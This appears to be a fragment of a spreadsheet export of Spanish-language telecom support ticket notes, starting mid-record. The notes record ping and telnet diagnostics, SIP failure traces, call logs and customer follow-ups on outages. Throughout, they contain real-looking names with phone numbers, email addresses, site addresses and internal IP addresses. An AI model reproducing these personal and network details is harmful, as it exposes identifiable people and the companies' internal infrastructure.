    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 190.56.194.170 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 4/12/140 MS
&lt;SLLAGTSLN1T2C01B02EIM2&gt;</t>
  </si>
  <si>
    <t>EN GESTION CON TECNICO SE VALIDA QUE NO HAY ACCESO VIA TELNET A CISCO, RESPONDIO A PING BREVEMENTE PERO SE PIERDE PING AL HACER PRUEBA DE DESCONEXION PARA VALIDAR WAN
&lt;SLLAGTSLN1T2C01B02EIM2&gt;TELNET VPN-INSTANCE INTERNET_GT_DEPTAL 10.174.167.79
TRYING 10.174.167.79 ...
PRESS CTRL+K TO ABORT
ERROR: FAILED TO CONNECT TO THE REMOTE HOST.
&lt;SLLAGTSLN1T2C01B02EIM2&gt;PING -VPN-INSTANCE INTERNET_GT_DEPTAL 10.174.167.79
  PING 10.174.167.79: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.174.167.79: BYTES=56 SEQUENCE=1 TTL=255 TIME=12 MS
    REPLY FROM 10.174.167.79: BYTES=56 SEQUENCE=2 TTL=255 TIME=14 MS
    REPLY FROM 10.174.167.79: BYTES=56 SEQUENCE=3 TTL=255 TIME=16 MS
    REPLY FROM 10.174.167.79: BYTES=56 SEQUENCE=4 TTL=255 TIME=17 MS
    REPLY FROM 10.174.167.79: BYTES=56 SEQUENCE=5 TTL=255 TIME=16 MS
  --- 10.174.167.79 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 12/15/17 MS
&lt;SLLAGTSLN1T2C01B02EIM2&gt;PING -C 1500 -M 30 -B -VPN-INSTANCE INTERNET_GT_DEPTAL 10.174.167.79
  PING 10.174.167.79: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.....................
  --- 10.174.167.79 PING STATISTICS ---
    349 PACKET(S) TRANSMITTED
    328 PACKET(S) RECEIVED
    6.01% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 6/11/37 MS</t>
  </si>
  <si>
    <t>F4593265</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ISRAEL VELASQUEZ AL 33903496 INDICA QUE REALIZARA UNAS CONSULTAS Y ESTARA RESPONDIENDO CORREO **
ID 1001902199
**</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE TANIA, INDICA ESTADO DE LICES LED EN EQUIPO ASMI PWR: VERDE, TST: APAGADO , SYNC: ROJO , ALM: ROJO, CONFIRMA LOS SIGUIENTES DATOS.
DIRECCION:14 CALLE 0-40 ZONA 1, BARRIO 3 DE ABRIL SAN BENITO, FRENTE AL COLEGIO SAGRADA FAMILIA.
CONTACTO: TANIA 78248835
HORARIO DE ATENCION:  8:00 A 15:30 HORAS
PERMISOS: NO
NÚMERO: 7753
FIN: HOY, 15:39
ID DE LLAMADA: 1001832427</t>
  </si>
  <si>
    <t>F4593266</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA
SE HABLO CON EL CLIENTE EDWIN SANDOVAL, QUIEN INDICA QUE LOS CABLES HACIA LA PBX ESTABAN CRUZADOS.
PROCEDIO A COLOCARLOS CORRECTAMENTE Y VALIDA QUE YA POSEE LLAMADAS EN AMBAS VIAS.
1001833289
COLA:
NOMBRE: A: 77977977
NÚMERO: 77977977
DURACIÓN: 0:00:24
ESTADO: CONECTADA
DETALLES: 77977977
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 7/06/2022 15:29:58</t>
  </si>
  <si>
    <t>F4593300</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO A PERSONAL DE BANCO AZTECA VIA SKYPE</t>
  </si>
  <si>
    <t>JORGE HERNANDEZ INFORMA VIA SKYPE QUE SE TRASLADARON Y EL BANCO AUN ESTA VIENDO SI DARAN DE BAJA O REINSTALAN EL ENLACE, INDICA QUE LO ESTAN VIENDO CON LA EJECUTIVA
*-*
JORGE, 20:17
BUENAS NOCHES @KENNY, SE TRASLADARON Y EL BANCO AUN ESTA VALIDADO SI LO DAN DE BAJA O LO TRASLADAN AL NUEVO PUNTO, ESTO LO ESTAN VIENDO CON LA EJECUTIVA
*-*</t>
  </si>
  <si>
    <t>F4593305</t>
  </si>
  <si>
    <t>SE LLAMÓ A PR 54666931/59885552 PARA SEGUIMIENTO, NO CONTESTAN, SEGUNDO TEL ES NÚMERO EQUIVOCADO, SE LLAMÓ/HABLÓ CON WALTER REYES/CENTRAL 45787911 SE LE PIDE APOYO CON TELS ADICIONALES, INDICA QUE AÚN NO TIENE, PERO EN CUANTO LOS TENGA LOS ENVIARÁ POR CORREO O LLAMARÁ.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSUE HERNANDEZ - 59885552 MENCIONA NUMERO EQUIVOCADO
-ID 1001831577</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS JAVIER GALVEZ  54666931  SUENA DESCONECTADO
-ID 1001830844 - 1001831036</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL WALTER REYES 45787911 MENCIONA QUE NO CUENTA CON OTRO CONTACTO, AL CNTAR CON ALGUNO LO ESTARA COMPARTIENDO POR CORREO
-ID 1001832084</t>
  </si>
  <si>
    <t>F4593315</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 24139090 EXT 82770 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001867633</t>
  </si>
  <si>
    <t>SE LLMA A CLIENTE MOISES MENDEZ 30727797 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001912103</t>
  </si>
  <si>
    <t>SE HABLÓ CON MARLON NAVAS/CLIENTE 30727797 INDICA ENLACE OK, PIDE SE MANTENGA SERVICIO EN MONITOREO PARA MAÑANA A LAS 08:00AM.</t>
  </si>
  <si>
    <t>**SE LLAMA A  CLIENTE ENCARGADO AL 24139090 EXT 82770 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001842198
**</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, EN CRONO ANTERIOR SE INDICÓ QUE CLIENTE SOLICITÓ MONITOREO PARA MAÑANA A LAS 08:00AM
POR FAVOR LEER CRONOS ANTERIORES, SE PIDE APOYO A GESTIÓN N1 MOVER TICKET A TAL ESTADO.</t>
  </si>
  <si>
    <t>F4593318</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HENRY SEGOVIA AL 60670084 SE CONTACTA NUEVAMENTE A CLIENTE Y SE DEJA EN LINEA CON GESTOR  **
ID 1001845371
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLEINTE BLADIMIR COMENTA QUE SE PUEDA REALIZAR LA VISIT DE 1 DE LA TARDE A 2 PM, POR LO QUE SE ESTA INFORMANDO A PERSONAL DE CAMPO
2001583051
COLA:
NOMBRE: A: 50374354248
NÚMERO: 50374354248
DURACIÓN: 0:02:00
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50374354248
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 11/06/2022 09:43:03</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRY PERO ENVIA A BUZON
2001582701
COLA:
NOMBRE: A: 50360670084
NÚMERO: 50360670084
DURACIÓN: 0:00:46
ESTADO: CONECTADA
DETALLES: 50360670084
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 11/06/2022 09:40:00</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRRY COMENTA QUE YA ESTA EN SITIO POR LO SE PROCEDE A PAERTURAR FALLA
2001633937
COLA:
NOMBRE: A: 50360670084
NÚMERO: 50360670084
DURACIÓN: 0:00:51
ESTADO: CONECTADA
DETALLES: 50360670084
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 11/06/2022 13:14:35</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HENRY SEGOVIA AL 60670084 INDIA QUE PERSISTE LA FALLA || SE NOTIFICA A GESTOR **
ID 1001843112
**</t>
  </si>
  <si>
    <t>F4593325</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO VISITA EN CONJUNTO A LAS 10:00HRS
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: MARTES, 7 DE JUNIO DE 2022 17:42
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; OPERADORES ATM 3 &lt;OPERADORES.ATM3@TAV.COM.GT&gt;; LUIS BOSARREYES &lt;LBOSARREYES@5B.COM.GT&gt;
CC: LGALINDO@5B.COM.GT &lt;LGALINDO@5B.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; TELECOMUNICACIONES &lt;TTI@5B.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: F4593325 || 5B || ATM 4238 || JOCOTILLO VILLACANALES
BUENAS TARDES APRECIABLE CLIENTE
SOLICITAMOS DE SU APOYO COORDINANDO VISITA PARA EL DIA DE MAÑANA A LAS 10:00HRS
ACTUALMENTE EL CAJERO SE ENCUENTRA DOWN.
UBICADO EN: CAJERO 4238_ALDEA EL JOCOTILLO, VILLA CANALES GUATEMALA_BANRURAL JOCOTILLO
DATOS DEL PERSONAL TÉCNIC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t>
  </si>
  <si>
    <t>*- SE SOLICITA APOYO A PERSONAL DE CNOC VIA SKYPE YA QUE NO SE HA BRINDADO RESPUESTA A CORREO DE PRUEBAS COMPARTIRDOS POR CLIENTE Y SE TIENE ESCALACION DE EJECUTIVA -*
-*</t>
  </si>
  <si>
    <t>F4593326</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  LIC. CÉSAR URBINA 25912930 NO SE LOGRA LA COMUNICACION, SE INTENTARA LUEGO
-ID 1001871284</t>
  </si>
  <si>
    <t>**SE SE LLAMA A CLAUDIA MALDONADO   25913426  |  NO CONTESTA | SE INTENTARA LUEGO **
ID 1001899825
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  LIC. CÉSAR URBINA AL 25912930 NO CONTESTA || SE INTENTARA LUEGO **
ID 1001905042
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CÉSAR URBINA 25912930 SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001914113</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  LIC. CÉSAR URBINA AL 25912930 NO CONTESTA || OPERADORA DA TONO QUE NUMERO NO EXISTE || SE INTENTARA LUEGO **
ID 1001899728
**</t>
  </si>
  <si>
    <t>EN 200 METROS A ORIENTE REVISAN EN PLANTA EXTERNA, HACIENDO VALIDACIONES DE CAMPO  VALIDANDO SEÑALES REVIBIDAS EN MODEM
TECNICO EN ESPERA QUE DATOS VALIDE LA CONFIGURACION DE DSLAM</t>
  </si>
  <si>
    <t xml:space="preserve">	WO OPEN                                			9:00:00 A. M.
1/5	RICARDO DE PAZ	78432633	2 HORAS	11:00:00
2/5	HUMBERTO CHIQUILLO		3 HORAS	12:00:00
3/5	HUMBERTO CHIQUILLO	78523419	4 HORAS	13:00:00
4/5	OSCAR HERNANDEZ	7855-0164	5 HORAS	14:00:00
5/5	JUAN RIVAS 	7606-7202	7 HORAS	16:00:00</t>
  </si>
  <si>
    <t>F4593327</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 2593-0005 NO SE LOGRA LA COMUNICACION, SE INTENTARA LUEGO
-ID 2001135781</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  2593-0005 NO RESPONDE, SE INTENTARA LUEGO **
-ID 2001034476
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 25930005 ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 1001917321</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  2593-0005 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001946247</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CLAUDIA MALDONADO 25913426 MENCIONA QUE YA NO HAY NADIE EN SITIO Y NO SE PUDO CONTACTARSE CON NADIE SOLICITA QUE SE LE DE SEGUIMIENTO MAÑANA DE 8:00 A 8:30 AM **
-ID 2001078906
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDIA MALDONADO 25913426 MENCIONA QUE VALIDARA ALGUN OTRO CONTACTO POR LO QUE SOLICITA LLAMADA PARA LAS 16:30
-ID 2001049686</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 25930005 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001049429</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CLAUDIA MALDONADO 71678297 INDICA QUE NO SE HA LOGRADO COMUNICAR AL SITIO Y SOLICITA MEJOR UNA VISITA TECNICA YA QUE INDICA QUE NO SE PUEDEN REALIZAR PRUEBAS YA QUE EN EL SITIO SOLO MUJERES HAY Y NO PUEDEN HACER UN REINICIO YA QUE EL EQUIPO ESTA EN ALTO Y PELIGROSO QUE SE SUBAN Y BRINDA LOS SIGUIENTES DATOS || SE NOTIFICA A GESTOR**
HORARIO DE ATENCION:7:00 A 12:00 Y 13:00 A 15:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: CALLE PRINCIPAL CASA 84 COLONIA EL SCANDIA AYUTUXTEPEQUE.
ATENDERA EN SITIO: LA DIRECTORA O SECRETARIA NO CUENTA CON LOS NOMBRES. 25930005
-ID 2001247233 - 2001247433
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDIA MALDONADO 71678297 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001138090</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CLAUDIA MALDONADO 71678297 INDICA QUE NO SE HA LOGRADO COMUNICAR AL SITIO SOLICITA QUE SE LE LLAME A LAS 13:15 HRS NUEVAMENTE **
-ID 2001207257
**</t>
  </si>
  <si>
    <t>F4593329</t>
  </si>
  <si>
    <t>SE LLAMO AL 22934902 INFORMA QUE SRTA ENCARGADA DE VALIDAR LOS EQUIPOS DE RED YA SE RETIRO DEL SITIO, SOLICITA LLAMAR MAÑANA DESDE LAS 8:00 AM PARA REALIZAR LAS PRUEBAS SOLICITADAS...
 ##SE DETIENE PROCESO DE ESCALACION.</t>
  </si>
  <si>
    <t>SE LLAMA A PR 22934902 MENCIONA QUE NO PUEDE APOAR CON LAS PRUEBAS PORQUE ESTA OCUPADA, SOLICITA VSITA TECNICA
-ID 1001918219
NOMBRE DEL CLIENTE: INSTITUTO SALVADORENO DEL SEGURO SOCIAL
UBICACIÓN:REPARTO MONTEMARIA 2 PASAJE 3 CASA #1 SOYAPANGO MONTEMARIA
HORARIO DE ATENCION:MAÑANA A LAS 8
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4593330</t>
  </si>
  <si>
    <t>##CLIENTE INDICA QUE HOY POR LA MADRUGADA  SE LE FUE LA ENERGIA ##  SE REALIZAN TRAZAS Y SE OBSERVA QUE PBX SIGUE LIBERANDO LA LLAMADA ### CLIENTE APLICA RESET A PBX Y SERVICIO NO RESTABLECE##PBX SIGUE LIBERANDO LA LLAAMDA### SE LE INDICA A CLIENTE QUE DEBE ESCALAR CASO A SU PROVEEDOR DE PBX,, PERO CLIENTE EXIGE CERTIFICACION ## SE LE CONSULTA  A CLIENTE SOBRE SI POSEE CREDENCIALES E INDICA QUE NO LAS TIENE- SE LE INDICA QUE ES INDISPENSABLE QUE LAS TENGA PARA PODER CERTIFICAR ||| CLIENTE VERIFICARA QUIEN TIENE LAS CREDENCIALES + PIDE SE LE MARQUE MAÑANA  A LAS 9AM ##VIVO
SIP/2.0 480 TEMPORARILY UNAVAILABLE
VIA: SIP/2.0/UDP 10.16.113.35:5060;BRANCH=Z9HG4BKOTWEO8HCXAACYLYALAHXCXYXA;ROLE=3;DPT=7BC2_36;TRC=FFFFFFFF-4753
RECORD-ROUTE: &lt;SIP:10.16.113.35;LR;DPT=7BC2_36;ROLE=3;CXTID=4;SPLN=P;X-HWB2BUACOOKIE=546;TRC=FFFFFFFF-4753&gt;
CALL-ID: 3AAZ2101PVHH3P2LZ0IHLJG01P2803A3@ATS.CEATS1.IMSHWI.CLARO.COM.GT.17
FROM: &lt;SIP:22245388@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=RAXG0A2H-CC-17-TRC-80522
TO: &lt;SIP:22311919@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=SBC040640DA2E8D-FA87-4EA4-918B-3F114BB1D0F8
CSEQ: 1 INVITE
SERVER: GRANDSTREAM UCM6301V1.2C 1.0.5.4
ALLOW: OPTIONS,REGISTER,SUBSCRIBE,NOTIFY,PUBLISH,INVITE,ACK,BYE,CANCEL,UPDATE,PRACK,REFER,MESSAGE
REASON: Q.850;CAUSE=20;TEXT="SUBSCRIBER ABSENT"
P-ACCESS-NETWORK-INFO: IEEE-802.11;CGI-3GPP=CLIENTES_VARIOS2;ACCESS-DOMAIN=PCSCF.IMSHWI.CLARO.COM.GT;"UE-IP=10.174.209.242";"UE-PORT=5060"
CONTENT-LENGTH: 0
SIP/2.0 480 TEMPORARILY UNAVAILABLE
VIA: SIP/2.0/UDP 10.78.9.221:5060;RPORT=5060;RECEIVED=10.78.9.221;BRANCH=Z9HG4BKDGYEL9TATXTADWG8WYEYACXT9T24004
CALL-ID: ASBCZZHL23VPPH21AZJ02GLLX11J2GPGJXR0@ATS.CEATS1.IMSHWI.CLARO.COM.GT.17
FROM: &lt;SIP:22245388@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=SBC040333HXXJIZ-CC-17-TRC-80523
TO: &lt;SIP:22311919@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=3F427E16-E935-4D22-91BF-005750859F20
CSEQ: 1 INVITE
SERVER: GRANDSTREAM UCM6301V1.2C 1.0.5.4
ALLOW: OPTIONS, REGISTER, SUBSCRIBE, NOTIFY, PUBLISH, INVITE, ACK, BYE, CANCEL, UPDATE, PRACK, REFER, MESSAGE
REASON: Q.850;CAUSE=20;TEXT="SUBSCRIBER ABSENT"
CONTENT-LENGTH: 0</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GIOVANY GOMEZ-59668656  ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GIOVANY GOMEZ-59668656 ### VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GIOVANY GOMEZ-59668656 ##  CLIENTE INDICA QUE EL PROBLEMA FUE UN ROUTER A NIVEL INTERNO ##SE PROCEDE AL CIERRE ##
1001938562
COLA:
NOMBRE: A: 59668656
NÚMERO: 59668656
DURACIÓN: 0:00:21
ESTADO: CONECTADA
DETALLES: 59668656
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 8/06/2022 09:43:18</t>
  </si>
  <si>
    <t>##SE TIENE A CLENTE EN LINEA ###</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GIOVANY GOMEZ-59668656 ### SE TIENE EN LINEA ##</t>
  </si>
  <si>
    <t>SE HA LLAMDO A CLIETNE 3 VECES GIOVANY GOMEZ-59668656 ##ENVIA DIRECTO A BUZON ##VIVO</t>
  </si>
  <si>
    <t>F4593341</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR  LOS CAMBIOS
NOMBRES DE EXTENSIONES
MONICA YIREH CASTILLO POON
BUENOS DÍAS @EVELYN ANDREA ÁLVAREZ COSAJAY/ @LAURA MELIZA LOPEZ CHACON
YA FUERON EFECTUADOS LOS CAMBIOS EN EL NOMBRE DE LAS EXTENSIONES, FAVOR SU APOYO VALIDANDO.
SALUDOS,</t>
  </si>
  <si>
    <t>F4593345</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, CON GRAFICAS SOLICITADAS, SE ADJUNTAN AL TICKET
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: MARTES, 7 DE JUNIO DE 2022 16:33
PARA: JCNIZ@TSE.ORG.GT &lt;JCNIZ@TSE.ORG.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: TRIBUNAL SUPREMO ELECTORAL - TSE | 807900004T | SD1132966
BUENOS DÍAS, ESTIMADO CLIENTE.
EN SEGUIMIENTO AL SERVICIO REPORTADO SE ADJUNTA LAS SIGUIENTES GRÁFICAS DE CONSUMO.
QUEDAREMOS ATENTOS A SUS COMENTARIOS,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUE CANIZ AL 41673388  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001946606
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUE CANIZ AL 41673388 NO RESPONDE, ENVIA A BUZON ||
SE INTENTARA LUEGO **
ID 1001906475
**</t>
  </si>
  <si>
    <t>F4593353</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3353
ID: 17400414T
IDENTIFICADOR DEL CLIENTE: CC_CREDOMATIC_GT_INTERNET_AGENCIA_0107
UBICADO EN: INTERNET_2A. AVENIDA 2-45, ZONA 1, CANTON SANTA TERESA CUYOTENANGO SUCHITEPÉQUEZ
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4593368</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KEVIN  OXLAJ AL 30122249  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 100907295
**</t>
  </si>
  <si>
    <t>F4593376</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALAN RALON  AL 59304403 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001000402
**</t>
  </si>
  <si>
    <t>F4593381</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BYRON HERNANDEZ 24583030 MENCIONA QUE ESTA PRESENTANDO PERDIDA DE PAQUETES, SE CONFIRMA CORREO PARA ENVIAR PRUEBAS
NOC@ATEL.COM.GT
-ID 1001851025</t>
  </si>
  <si>
    <t>SE HABLÓ CON BYRON HERNÁNDEZ/CLIENTE 24583030 INDICA QUE VERIFICARÁN CON SU CLIENTE FINAL; PIDE SE LE LLAME A LAS 19:00 HORAS PARA SEGUIMIENTO Y/O VALIDAR SERVICIO.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 7 DE JUNIO DE 2022 16:51
PARA: NOC@ATEL.COM.GT &lt;NOC@ATEL.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: A-TEL COMMUNICATIONS, S.A. || 59700063T || F4570216
BUENA TARDE
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE, QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE HABLÓ CON ERICK CONTRERAS/CLIENTE 24583030 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4593392</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE, CRISTIAN COLOP, SE LE INDICA DE INTERFAZ CAIDA HACE APROXIMADAMENTE 2 HORAS, INDICA QUE ESTAR CONTACTANDO AL AREA DE IT DE PRONE Y SOLICITA SE LE LLAME MAÑANA EN HORARIO HABIL Y QUE SE MANTENGA TICKE EN PENDIENTE CLIENTE YA QUE ESTARA REALIZANDO PRUEBAS.
NÚMERO: 44614261
FIN: HOY, 17:29
ID DE LLAMADA: 1001865335
1001865335
COLA:
NOMBRE: A: 44614261
NÚMERO: 44614261
DURACIÓN: 0:11:34
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 44614261
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 7/06/2022 17:29:41</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTIAN COLOP AL  44614261 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001908354
**</t>
  </si>
  <si>
    <t>F4593393</t>
  </si>
  <si>
    <t>F4593395</t>
  </si>
  <si>
    <t>F4593403</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 00 525551745299 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE, ADICIONAL SE PIDE APOYO VÍA CORREO:
